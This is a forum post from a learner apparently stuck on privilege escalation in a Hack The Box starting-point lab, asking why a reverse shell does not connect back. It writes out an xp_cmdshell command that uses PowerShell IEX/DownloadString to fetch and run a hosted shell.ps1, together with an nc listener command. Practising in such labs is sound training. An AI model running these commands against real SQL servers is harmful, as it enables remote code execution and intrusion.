Hi forum I am totally stuck here.
Running through starting point im up to privilege escalation.
I have managed to connect to the SQL box with mssqlclient.py and enabled the xp_cmdshell. Everything looks normal with that.
I have created the powershell script that that will run on the target SQL box and hosted it on an apache webserver. Running the url to the file opens the .ps1 script in the browser so all good there. I also updated the IP address in the powershell script to my VPN IP address.
Starting nc -lvnp 443 looks OK. I can see listening port 443 on any adaptor.
My laptop isn’t running a firewall.
When I run:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.3/shell.ps1\“);”
its not conneting back to my kali machine.
Any assistance much appreciated…
Thanks
